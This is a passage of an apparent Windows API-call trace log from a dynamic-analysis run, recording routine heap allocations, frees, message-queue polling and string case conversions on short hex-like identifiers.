wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0210.203] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0210.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0210.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0210.204] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0210.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf30 [0210.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a739c8 [0210.204] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0210.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0210.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0210.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0210.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0210.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0210.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0210.204] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0210.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0210.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0210.204] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0210.205] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0210.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0210.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0210.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0210.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0210.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0210.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0210.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0210.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0210.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a739c8 | out: hHeap=0x2af0000) returned 1 [0210.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0210.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0210.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0210.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0210.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0210.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0210.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0210.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0210.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0210.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0210.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0210.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0210.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0210.206] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0210.206] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0210.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0210.206] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0210.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0210.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74238 [0210.206] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0210.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0210.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0210.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0210.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0210.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0210.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0210.206] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0210.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0210.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0210.207] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0210.207] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0210.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0210.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0210.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0210.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0210.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0210.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0210.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0210.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0210.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0210.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0210.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0210.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.208] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74238 | out: hHeap=0x2af0000) returned 1 [0210.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0210.208] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0210.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0210.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.208] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0210.208] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0210.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0210.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0210.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0210.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0210.208] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0210.208] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0210.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0210.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0210.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0210.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0210.209] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0210.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0210.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0210.209] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0210.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.209] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0210.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0210.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0210.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0210.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.209] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0210.209] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0210.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0210.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9d910 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0210.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0210.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0210.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0210.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0210.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0210.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0210.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0210.212] HeapFree (in: hHeap=0x2af0000, 